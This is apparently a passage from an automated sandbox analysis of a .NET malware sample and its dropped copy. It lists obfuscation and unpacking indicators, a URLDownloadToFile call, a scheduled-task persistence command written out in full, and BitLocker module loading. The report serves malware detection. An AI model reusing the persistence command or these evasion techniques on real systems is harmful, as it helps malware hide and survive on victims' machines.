                  Source: Binary string: JzWg.pdbSHA256 source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr
                  Source: Binary string: JzWg.pdb source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  .NET source code contains potential unpacker
                  Source: PEbZthAqV9.exe, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                  Source: myTuDsvNcebev.exe.0.dr, LogInGUI.cs.Net Code: InitializeComponent contains xor as well as GetObject
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.cs.Net Code: v39pIehFEK System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.cs.Net Code: v39pIehFEK System.Reflection.Assembly.Load(byte[])
                  Source: PEbZthAqV9.exeStatic PE information: 0x8B52382E [Tue Jan 26 11:42:38 2044 UTC]
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041A8DA
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_00C1F362 push esp; iretd 0_2_00C1F3F1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D30580 pushfd ; iretd 0_2_02D3058D
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_0754894D push esp; retf 0_2_0754894E
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_0AD62A7A push eax; ret 0_2_0AD62A81
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 9_2_011EF3F0 push esp; iretd 9_2_011EF3F1
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004000D8 push es; iretd 18_2_004000D9
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040008C push es; iretd 18_2_0040008D
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004542E6 push ecx; ret 18_2_004542F9
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0045B4FD push esi; ret 18_2_0045B506
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00432BD6 push ecx; ret 18_2_00432BE9
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00454C08 push eax; ret 18_2_00454C26
                  Source: PEbZthAqV9.exeStatic PE information: section name: .text entropy: 7.959401786554723
                  Source: myTuDsvNcebev.exe.0.drStatic PE information: section name: .text entropy: 7.959401786554723
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, bJJVsBZZWgOVwbYkM5H.csHigh entropy of concatenated method names: 'BLbclbeM6e', 'RZyczqj4OV', 'WqxF1SDrrD', 'bBaFZYFLLE', 'GkXFOixNoJ', 'h4yFhNtP23', 'xkcFpjSY5s', 'k69FqNFuUb', 'JyIFU4kytM', 'GW5F22KD8b'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, Se72bX2q1AuSqG7kSF.csHigh entropy of concatenated method names: 'Dispose', 'LWSZo57lT5', 'SuXO0Z7aqI', 'dV6h2eI2rm', 'flBZllMxCZ', 'yrgZzg7JRs', 'ProcessDialogKey', 'xyMO1f1UXR', 'SebOZexk4D', 'Y3DOOpDtLA'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, PIXv6ZS2O2mf260BiF.csHigh entropy of concatenated method names: 'l6n8TUCkCT', 'Hw78ver0du', 'mB58IWYNIx', 'ICi8XVoK2r', 'qot8xqMB8h', 'StP8an8c4r', 'PHt84QYGJf', 'QLx8uyVQKs', 'tI78f7eEls', 'oFm8w1TiIN'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, vtKDw7ZpBufmfHDAOH2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nQoMEDUNYf', 'qbDMc6dr1I', 'KvxMFoJosn', 'vPnMMf4buf', 'ngMMyRJ9UF', 'ClgMVwMhZC', 'O1DMA9eF61'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.csHigh entropy of concatenated method names: 'zfFhqLtP1Q', 'obHhUaATMG', 'R6Eh2gYNUn', 'oo1hsQVpJR', 'QNGhYRgsWq', 'ROHhQiiwa3', 'TkKh8YjOMg', 'OdYhjy8kWY', 'nHvhLdGLLM', 'f2GhkOX1Sb'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, tCSnZlDsIa6rFn7GG9.csHigh entropy of concatenated method names: 'ToString', 'A5o36cRDsZ', 'zO130AT7B5', 'nTg3GdRUB3', 'rw23BBIrvi', 'ncJ3n9xJM3', 'bZy3gRyNLh', 'Yko3HPhxnj', 'VWL3iPZxyw', 'llL3SJU8H1'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, f6ScPn9UHN3hdBbliX.csHigh entropy of concatenated method names: 'GnsbkojfWy', 'hNkbW0TCxN', 'ToString', 'aDVbURZ4a4', 'Fiqb2HbLnn', 'maEbsDy78N', 'JA1bY2Xqws', 'KTgbQ66vIk', 'oZdb85MLBh', 'CBAbjaTixM'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, riiSb4fVjgPtn8JMCB.csHigh entropy of concatenated method names: 'z6isXnC5H1', 'gpDsarNQcf', 'wCZsuWBNu6', 'mZmsfd9NEs', 'zU6sr8ICXu', 'Vbas3v9gar', 'M2vsbvqQdN', 'XY0sKsXrc2', 'eJLsE1tSlp', 'NNOscxdF2E'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, ajPx2iepbHWS57lT5U.csHigh entropy of concatenated method names: 'wqKErt2PKI', 'q25Ebv81C8', 'vTUEEHd8Ec', 'gyHEFYHTxw', 'sc6EyiPEa8', 'VYWEAmMTub', 'Dispose', 'SxXKUTAffk', 'TrPK2Obx5e', 'VfAKsytwQA'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, jstQxWtP7DH8HSjhvZ.csHigh entropy of concatenated method names: 'OsZbC2YjZv', 'X84blfwKcl', 'BIxK1kUsvN', 'bO7KZCVPN8', 'Hiub6hNJrE', 'rWgbPhhcO8', 'OrcbN5uHrg', 'ADJbmSV2oI', 'G5mbJdkbU6', 'sECbD1YpFW'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, SXi2orgn1dwbsuM2Lf.csHigh entropy of concatenated method names: 'uprQDY0xU3', 'bwuQ9IYMBm', 'PvDQRJyJYA', 'ToString', 'fx1QtCOmKY', 'pqNQeNC7DG', 'RWrdARt8k5iBXr7LFAl', 'Eu4s1YtEGxAZnlY9Bju'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, BOgBkgOlpToyZQ4PIn.csHigh entropy of concatenated method names: 'zrTIUxCJr', 'vlrXglpIV', 'cQOajabuN', 'CWA4UwE8J', 'fayfKtrh1', 'wHtwnJfcS', 'sRtjDAh1oWLsfIBGn3', 'U9PDPRGb3Q2gaQTFxc', 'IBVKhudrW', 'oPAcQWoBB'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, up75WPBHDKxGK74l5D.csHigh entropy of concatenated method names: 'okhQAYEuT6', 'zE8QTLslEe', 'vb2QI2Vn0t', 'WVtQXZx0oJ', 'QUSQa62pD3', 'BRLQ4Ajmqk', 'T2sQfHVWaW', 'zYCQwsN4pt', 'HP1seAtXh29Kj8vOkMS', 'gYGM6styK8i1hY9I0aV'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, g7jqwbz9DZivOojC0W.csHigh entropy of concatenated method names: 'xABcaXvrpa', 'Rc9cudJPK5', 'qRCcfeYjlL', 'nEScd34bCS', 'Ntsc0Co8jP', 'puEcBT92n8', 'YmvcnGAJaV', 'IEycAp0I9J', 'wxecTFGDWk', 'sIScvnXGaq'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, NgxYVCZ1h6HrgfIyLQJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L6Pc6aE0L4', 'A93cPGZ7ps', 'JqUcNNsq4A', 'VJacmuyG93', 'VeBcJ6vGmR', 'QfJcDHAwaM', 'fC2c9X0BhT'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, b2MbunNjObHG4VlQlF.csHigh entropy of concatenated method names: 'Tak7uvfay3', 'HjF7fMSx9b', 'a5F7dfcqgL', 'hiJ70ohiQb', 'fQk7BVCr31', 'm8g7nVxrxw', 'yml7HpxFC1', 'FQ67iTf5LF', 'Eh275BoJa4', 'pja76UJwQh'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, vjUUPrdHML4I34Jdy4.csHigh entropy of concatenated method names: 'DPNQq3wWid', 'A87Q2K6vat', 'E3FQYYAKoJ', 'KlKQ8BZTvX', 'xokQjSHU1P', 'tJ2YRj0FbB', 'mPMYtJ8jv8', 'CFSYe56n6F', 'GY5YCHjADJ', 'wXsYocT4MK'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, RhKX6GpiYHcU0yc3Gh.csHigh entropy of concatenated method names: 'zHKZ809dpi', 'OWuZjlYHTh', 'CVjZkgPtn8', 'SMCZWBGxD4', 'uH3ZrFTVjU', 'fPrZ3HML4I', 'EsokNCCTsg0wgKAihR', 'Fi61rl0C0CFl5hSF01', 'KTgZZB4bHZ', 'BYgZh5eeYD'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, uf1UXRoDebexk4Dl3D.csHigh entropy of concatenated method names: 'UPIEdXL72I', 'XBkE0PsLKL', 'd78EGgTKNi', 'ibuEBNcsDQ', 'rSSEnieE0g', 'OpgEgL8I44', 'oMiEHHnA9t', 'apMEiUsdTW', 'dICESEYXWr', 'YWoE5Wpt89'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, HxD4QkwiTf8WjMH3FT.csHigh entropy of concatenated method names: 'iQBYxOD5Cy', 'dxWY4lQJuB', 'f48sG5a2ZI', 'sTNsBK5G0g', 'QDFsnVFjFL', 'zTYsg8SeIj', 'DFUsH9rCaB', 'mk8sijFC9a', 'yvDsSClu2B', 'ESQs5gxXaY'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, skA3ZlZOGCdXkJCStvx.csHigh entropy of concatenated method names: 'ToString', 'iqGFujZKQv', 's8ZFfH89xX', 'AVuFwfrIpJ', 'pU1Fd1EAYp', 'E5WF0ppvS5', 'muOFGNTLit', 'Nf7FBHA0gX', 'zgu6DnUp4aRU43veNYV', 'dfmij9UCgTbH45SPZ7v'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, dDtLA9l8vTGFGEd474.csHigh entropy of concatenated method names: 'NhDcslR5kQ', 'jMDcYa04jY', 'l3EcQw2AHs', 'DcZc8GdAtS', 'FYAcElFP9C', 'BZVcjkX1rX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, q09dpiu5WulYHThgxc.csHigh entropy of concatenated method names: 'NO42mIlJVj', 'rkO2JOa1Np', 'Pm22DUrrGZ', 'Ui629xykK3', 'Sw42RJoThd', 'wS42tXJZM3', 'i4H2eMvNn5', 'o0R2CBs3Qv', 'wxt2o3f9AB', 'dIL2l8MKq6'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, bJJVsBZZWgOVwbYkM5H.csHigh entropy of concatenated method names: 'BLbclbeM6e', 'RZyczqj4OV', 'WqxF1SDrrD', 'bBaFZYFLLE', 'GkXFOixNoJ', 'h4yFhNtP23', 'xkcFpjSY5s', 'k69FqNFuUb', 'JyIFU4kytM', 'GW5F22KD8b'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, Se72bX2q1AuSqG7kSF.csHigh entropy of concatenated method names: 'Dispose', 'LWSZo57lT5', 'SuXO0Z7aqI', 'dV6h2eI2rm', 'flBZllMxCZ', 'yrgZzg7JRs', 'ProcessDialogKey', 'xyMO1f1UXR', 'SebOZexk4D', 'Y3DOOpDtLA'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, PIXv6ZS2O2mf260BiF.csHigh entropy of concatenated method names: 'l6n8TUCkCT', 'Hw78ver0du', 'mB58IWYNIx', 'ICi8XVoK2r', 'qot8xqMB8h', 'StP8an8c4r', 'PHt84QYGJf', 'QLx8uyVQKs', 'tI78f7eEls', 'oFm8w1TiIN'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, vtKDw7ZpBufmfHDAOH2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nQoMEDUNYf', 'qbDMc6dr1I', 'KvxMFoJosn', 'vPnMMf4buf', 'ngMMyRJ9UF', 'ClgMVwMhZC', 'O1DMA9eF61'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.csHigh entropy of concatenated method names: 'zfFhqLtP1Q', 'obHhUaATMG', 'R6Eh2gYNUn', 'oo1hsQVpJR', 'QNGhYRgsWq', 'ROHhQiiwa3', 'TkKh8YjOMg', 'OdYhjy8kWY', 'nHvhLdGLLM', 'f2GhkOX1Sb'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, tCSnZlDsIa6rFn7GG9.csHigh entropy of concatenated method names: 'ToString', 'A5o36cRDsZ', 'zO130AT7B5', 'nTg3GdRUB3', 'rw23BBIrvi', 'ncJ3n9xJM3', 'bZy3gRyNLh', 'Yko3HPhxnj', 'VWL3iPZxyw', 'llL3SJU8H1'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, f6ScPn9UHN3hdBbliX.csHigh entropy of concatenated method names: 'GnsbkojfWy', 'hNkbW0TCxN', 'ToString', 'aDVbURZ4a4', 'Fiqb2HbLnn', 'maEbsDy78N', 'JA1bY2Xqws', 'KTgbQ66vIk', 'oZdb85MLBh', 'CBAbjaTixM'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, riiSb4fVjgPtn8JMCB.csHigh entropy of concatenated method names: 'z6isXnC5H1', 'gpDsarNQcf', 'wCZsuWBNu6', 'mZmsfd9NEs', 'zU6sr8ICXu', 'Vbas3v9gar', 'M2vsbvqQdN', 'XY0sKsXrc2', 'eJLsE1tSlp', 'NNOscxdF2E'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, ajPx2iepbHWS57lT5U.csHigh entropy of concatenated method names: 'wqKErt2PKI', 'q25Ebv81C8', 'vTUEEHd8Ec', 'gyHEFYHTxw', 'sc6EyiPEa8', 'VYWEAmMTub', 'Dispose', 'SxXKUTAffk', 'TrPK2Obx5e', 'VfAKsytwQA'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, jstQxWtP7DH8HSjhvZ.csHigh entropy of concatenated method names: 'OsZbC2YjZv', 'X84blfwKcl', 'BIxK1kUsvN', 'bO7KZCVPN8', 'Hiub6hNJrE', 'rWgbPhhcO8', 'OrcbN5uHrg', 'ADJbmSV2oI', 'G5mbJdkbU6', 'sECbD1YpFW'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, SXi2orgn1dwbsuM2Lf.csHigh entropy of concatenated method names: 'uprQDY0xU3', 'bwuQ9IYMBm', 'PvDQRJyJYA', 'ToString', 'fx1QtCOmKY', 'pqNQeNC7DG', 'RWrdARt8k5iBXr7LFAl', 'Eu4s1YtEGxAZnlY9Bju'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, BOgBkgOlpToyZQ4PIn.csHigh entropy of concatenated method names: 'zrTIUxCJr', 'vlrXglpIV', 'cQOajabuN', 'CWA4UwE8J', 'fayfKtrh1', 'wHtwnJfcS', 'sRtjDAh1oWLsfIBGn3', 'U9PDPRGb3Q2gaQTFxc', 'IBVKhudrW', 'oPAcQWoBB'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, up75WPBHDKxGK74l5D.csHigh entropy of concatenated method names: 'okhQAYEuT6', 'zE8QTLslEe', 'vb2QI2Vn0t', 'WVtQXZx0oJ', 'QUSQa62pD3', 'BRLQ4Ajmqk', 'T2sQfHVWaW', 'zYCQwsN4pt', 'HP1seAtXh29Kj8vOkMS', 'gYGM6styK8i1hY9I0aV'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, g7jqwbz9DZivOojC0W.csHigh entropy of concatenated method names: 'xABcaXvrpa', 'Rc9cudJPK5', 'qRCcfeYjlL', 'nEScd34bCS', 'Ntsc0Co8jP', 'puEcBT92n8', 'YmvcnGAJaV', 'IEycAp0I9J', 'wxecTFGDWk', 'sIScvnXGaq'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, NgxYVCZ1h6HrgfIyLQJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L6Pc6aE0L4', 'A93cPGZ7ps', 'JqUcNNsq4A', 'VJacmuyG93', 'VeBcJ6vGmR', 'QfJcDHAwaM', 'fC2c9X0BhT'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, b2MbunNjObHG4VlQlF.csHigh entropy of concatenated method names: 'Tak7uvfay3', 'HjF7fMSx9b', 'a5F7dfcqgL', 'hiJ70ohiQb', 'fQk7BVCr31', 'm8g7nVxrxw', 'yml7HpxFC1', 'FQ67iTf5LF', 'Eh275BoJa4', 'pja76UJwQh'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, vjUUPrdHML4I34Jdy4.csHigh entropy of concatenated method names: 'DPNQq3wWid', 'A87Q2K6vat', 'E3FQYYAKoJ', 'KlKQ8BZTvX', 'xokQjSHU1P', 'tJ2YRj0FbB', 'mPMYtJ8jv8', 'CFSYe56n6F', 'GY5YCHjADJ', 'wXsYocT4MK'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, RhKX6GpiYHcU0yc3Gh.csHigh entropy of concatenated method names: 'zHKZ809dpi', 'OWuZjlYHTh', 'CVjZkgPtn8', 'SMCZWBGxD4', 'uH3ZrFTVjU', 'fPrZ3HML4I', 'EsokNCCTsg0wgKAihR', 'Fi61rl0C0CFl5hSF01', 'KTgZZB4bHZ', 'BYgZh5eeYD'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, uf1UXRoDebexk4Dl3D.csHigh entropy of concatenated method names: 'UPIEdXL72I', 'XBkE0PsLKL', 'd78EGgTKNi', 'ibuEBNcsDQ', 'rSSEnieE0g', 'OpgEgL8I44', 'oMiEHHnA9t', 'apMEiUsdTW', 'dICESEYXWr', 'YWoE5Wpt89'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, HxD4QkwiTf8WjMH3FT.csHigh entropy of concatenated method names: 'iQBYxOD5Cy', 'dxWY4lQJuB', 'f48sG5a2ZI', 'sTNsBK5G0g', 'QDFsnVFjFL', 'zTYsg8SeIj', 'DFUsH9rCaB', 'mk8sijFC9a', 'yvDsSClu2B', 'ESQs5gxXaY'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, skA3ZlZOGCdXkJCStvx.csHigh entropy of concatenated method names: 'ToString', 'iqGFujZKQv', 's8ZFfH89xX', 'AVuFwfrIpJ', 'pU1Fd1EAYp', 'E5WF0ppvS5', 'muOFGNTLit', 'Nf7FBHA0gX', 'zgu6DnUp4aRU43veNYV', 'dfmij9UCgTbH45SPZ7v'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, dDtLA9l8vTGFGEd474.csHigh entropy of concatenated method names: 'NhDcslR5kQ', 'jMDcYa04jY', 'l3EcQw2AHs', 'DcZc8GdAtS', 'FYAcElFP9C', 'BZVcjkX1rX', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, q09dpiu5WulYHThgxc.csHigh entropy of concatenated method names: 'NO42mIlJVj', 'rkO2JOa1Np', 'Pm22DUrrGZ', 'Ui629xykK3', 'Sw42RJoThd', 'wS42tXJZM3', 'i4H2eMvNn5', 'o0R2CBs3Qv', 'wxt2o3f9AB', 'dIL2l8MKq6'
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004063C6 ShellExecuteW,URLDownloadToFileW,18_2_004063C6
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeFile created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00418A00

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041A8DA
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
